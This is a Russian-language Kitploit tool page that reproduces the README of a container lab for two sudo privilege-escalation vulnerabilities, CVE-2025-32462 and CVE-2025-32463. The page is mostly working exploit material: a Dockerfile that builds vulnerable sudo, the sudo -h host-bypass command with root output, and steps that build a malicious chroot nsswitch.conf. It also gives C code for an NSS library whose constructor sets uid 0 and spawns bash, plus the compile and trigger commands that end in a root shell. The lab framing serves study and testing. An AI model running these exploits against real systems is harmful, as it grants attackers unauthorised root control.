Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32462-CVE-2025-32463-PoC-Lab — Лаборатория на основе контейнеров с эксплойтами proof-of-concept для двух критических уязвимостей sudo: обход проверки хоста (CVE-2025-32462) и внедрение библиотеки NSS через chroot (CVE-2025-32463) для повышения привилегий. | Kitploit
Инструменты/GitHubGitHub/yonathanpy/cve-2025-32462-cve-2025-32463-poc-lab
Повышение привилегийБезопасность контейнеровАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеЭксплуатация Бинарных ФайловЛаборатории и Практика

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
yonathanpy/cve-2025-32462-cve-2025-32463-poc-lab

CVE-2025-32462-CVE-2025-32463-PoC-Lab

Лаборатория на основе контейнеров с эксплойтами proof-of-concept для двух критических уязвимостей sudo: обход проверки хоста (CVE-2025-32462) и внедрение библиотеки NSS через chroot (CVE-2025-32463) для повышения привилегий.

Репозиторий
2146 месяцев назадЕщё не проверено

CVE-2025-32462 & CVE-2025-32463 – Продвинутая PoC-лаборатория

Этот репозиторий предоставляет лабораторию на основе контейнеров и подробный PoC для двух критических уязвимостей sudo:

  • CVE-2025-32462 – обход логики сопоставления хоста -h в sudo
  • CVE-2025-32463 – побег из chroot через NSS-библиотеку при использовании -R в sudo

Исследование и авторство

Оригинальное исследование: Rich Mirch – Stratascale CRU
PoC и лабораторная среда: MAAYTHM


Технический обзор

CVE-2025-32462 – Обход логики проверки хоста

Sudo обеспечивает авторизацию на основе хоста через Host_Alias в /etc/sudoers.
Уязвимость возникает при указании опции -h: sudo проверяет переданное имя хоста вместо канонического имени хоста системы, что позволяет ограниченным пользователям обходить политики sudo, основанные на хосте.

Воздействие:

  • Обход политик на основе хоста
  • Повышение привилегий
  • Несанкционированное выполнение команд от root

CVE-2025-32463 – Внедрение NSS через Chroot

Опция -R в sudo позволяет выполнение в среде chroot. Во время инициализации загружаются библиотеки NSS (Name Service Switch) на основе /etc/nsswitch.conf. Предоставив вредоносное окружение chroot и собственную библиотеку NSS, злоумышленник может выполнить код с правами root.

Поверхность атаки:

  1. Контролируемая файловая система chroot
  2. Определяемый атакующим nsswitch.conf
  3. Пользовательская динамически загружаемая библиотека NSS
  4. Код конструктора выполняется с повышенными привилегиями

Воздействие:

  • Повышение привилегий до root
  • Выполнение произвольного кода в контексте chroot

Лабораторная среда

  • Базовая ОС: Ubuntu 24.04
  • Уязвимая версия sudo: 1.9.16p2
  • Пользователи: pwn (без root)
  • Изоляция: Docker-контейнер с пользовательской сетью

Структура репозитория

root@kitploit:~
CVE-2025-32462-CVE-2025-32463-PoC-Lab
├── Dockerfile
│   # Builds vulnerable sudo environment
│
├── exploit/
│   ├── cve_2025_32463.c
│   │   # Malicious NSS shared library used for privilege escalation
│   └── build.sh
│       # Compiles the exploit payload into a shared NSS module
│
├── lab/
│   └── setup.sh
│       # Automates vulnerable lab configuration and sudoers setup
│
└── README.md
    # Technical documentation, vulnerability analysis, and PoC usage guide

Полный технический анализ, пошаговое описание PoC и руководство по эксплуатации


Настройка Docker-лаборатории

root@kitploit:~
FROM ubuntu:24.04

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && \
    apt-get install -y build-essential wget libpam0g-dev libselinux1-dev zlib1g-dev \
                       pkg-config libssl-dev git nano gcc && \
    rm -rf /var/lib/apt/lists/*

WORKDIR /opt
RUN wget https://www.sudo.ws/dist/sudo-1.9.16p2.tar.gz && \
    tar xzf sudo-1.9.16p2.tar.gz && \
    cd sudo-1.9.16p2 && \
    ./configure --disable-gcrypt --prefix=/usr && \
    make && make install

RUN useradd -m -s /bin/bash pwn && \
    echo 'pwn:pwn' | chpasswd

USER pwn
WORKDIR /home/pwn

CMD ["/bin/bash"]

Сборка и запуск лаборатории

root@kitploit:~
docker build -t sudo-vuln-lab .
docker network create --subnet=172.190.0.0/16 sudolabnet
docker run -d \
  --network sudolabnet \
  --ip 172.190.0.3 \
  --hostname lowpriv.test.local \
  --add-host highpriv.test.local:172.190.0.2 \
  --name lowpriv \
  sudo-vuln-lab tail -f /dev/null

CVE-2025-32462 – Эксплуатация

root@kitploit:~
docker exec -u root -it lowpriv bash
echo 'Host_Alias HIGH = highpriv.test.local' >> /etc/sudoers
echo 'Host_Alias LOW = lowpriv.test.local' >> /etc/sudoers
echo 'pwn HIGH,!LOW = NOPASSWD:ALL' >> /etc/sudoers

Normal behavior:

root@kitploit:~
sudo id
# Password required

Exploitation:

root@kitploit:~
sudo -h highpriv.test.local id
# uid=0(root) gid=0(root) groups=0(root)
sudo -h highpriv.test.local hostname -f
# lowpriv.test.local

CVE-2025-32463 – Эксплуатация

root@kitploit:~
mkdir -p exploitDir/etc
echo 'passwd: /cve_2025_32463' > exploitDir/etc/nsswitch.conf
mkdir libnss_
cp /etc/group exploitDir/etc/

Malicious NSS library:

root@kitploit:~
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void GIVEMEROOT(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/bash", "/bin/bash", NULL);
}

Compile:

root@kitploit:~
gcc -shared -fPIC -Wl,-init,GIVEMEROOT -o libnss_/cve_2025_32463.so.2 cve_2025_32463.c

Trigger:

root@kitploit:~
sudo -R exploitDir <command>
# Root shell obtained
id
# uid=0(root) gid=0(root)
Скачать инструмент